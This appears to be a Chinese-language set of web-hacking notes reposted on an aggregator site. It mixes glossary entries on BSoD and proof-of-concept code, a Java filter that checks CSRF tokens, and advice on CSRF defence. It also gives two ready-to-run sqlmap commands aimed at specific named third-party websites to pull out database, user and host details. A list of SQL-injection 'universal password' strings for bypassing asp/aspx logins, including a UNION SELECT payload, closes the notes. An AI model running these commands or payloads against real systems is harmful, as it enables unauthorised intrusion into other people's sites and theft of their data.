web hacker笔记

xiaoxiao2022-06-11  22

sqlmap.py -u "http://www.now.cn/ipm-admin/cusManager.php?IDIPM=55911" --threads 10 --level 3 -p myparams --dbms "MySQL" --current-db --current-user --hostname sqlmap -u "http://www.1think.com.cn/Search.php?SearchKeyWords=HAHA" --threads 15 --level 3 --dbms "Microsoft SQL Server" --os "Windows" --current-db --current-user --hostname

BSoD,Blue Screen of Death,即蓝屏死机。 微软操作系统的经典死机提示屏幕。通常是由于工作在Ring0级的内核程序出错导致的,比如内核程序访问了不可访问的内存会立即导致BSoD。


Proof of Conc Proof of Conceptept简称PoC, 中文翻译为概念证明,是证实发布的漏洞真实性的测试代码,一般可以理解为和漏洞利用工具差不多的意思。


在 filter 中验证请求中的 token

HttpServletRequest req = (HttpServletRequest)request; HttpSession s = req.getSession(); // 从 session 中得到 csrftoken 属性 String sToken = (String)s.getAttribute(“csrftoken”); if(sToken == null){ // 产生新的 token 放入 session 中 sToken = generateToken(); s.setAttribute(“csrftoken”,sToken); chain.doFilter(request, response); } else{ // 从 HTTP 头中取得 csrftoken String xhrToken = req.getHeader(“csrftoken”); // 从请求参数中取得 csrftoken String pToken = req.getParameter(“csrftoken”); if(sToken != null && xhrToken != null && sToken.equals(xhrToken)){ chain.doFilter(request, response); }else if(sToken != null && pToken != null && sToken.equals(pToken)){ chain.doFilter(request, response); }else{ request.getRequestDispatcher(“error.jsp”).forward(request,response); } }

跨站请求伪造CSRF漏洞防御 CSRF漏洞防御主要可以从三个层面进行,即服务端的防御、用户端的防御和安全设备的防御。 1、 服务端的防御 1.1 验证HTTP Referer字段 1.2 在请求地址中添加token并验证 1.3 在HTTP头中自定义属性并验证

2、其他防御方法

CSRF攻击是有条件的,当用户访问恶意链接时,认证的cookie仍然有效,所以当用户关闭页面时要及时清除认证cookie,对支持TAB模式(新标签打开网页)的浏览器尤为重要。尽量少用或不要用request()类变量,获取参数指定request.form()还是request. querystring (),这样有利于阻止CSRF漏洞攻击,此方法只不能完全防御CSRF攻击,只是一定程度上增加了攻击的难度。

asp aspx万能密码

1: "or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6: "or 1=1-- 7:'or'a'='a 8: "or"="a'='a 9:'or''=' 10:'or'='or' 11: 1 or '1'='1'=1 12: 1 or '1'='1' or 1=1 13: 'OR 1=1 14: "or 1=1 15: 'xor 16: 新型万能登陆密码 用户名 `' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)` 密码 1 Username=-1
转载请注明原文地址: https://www.6miu.com/read-4931456.html

最新回复(0)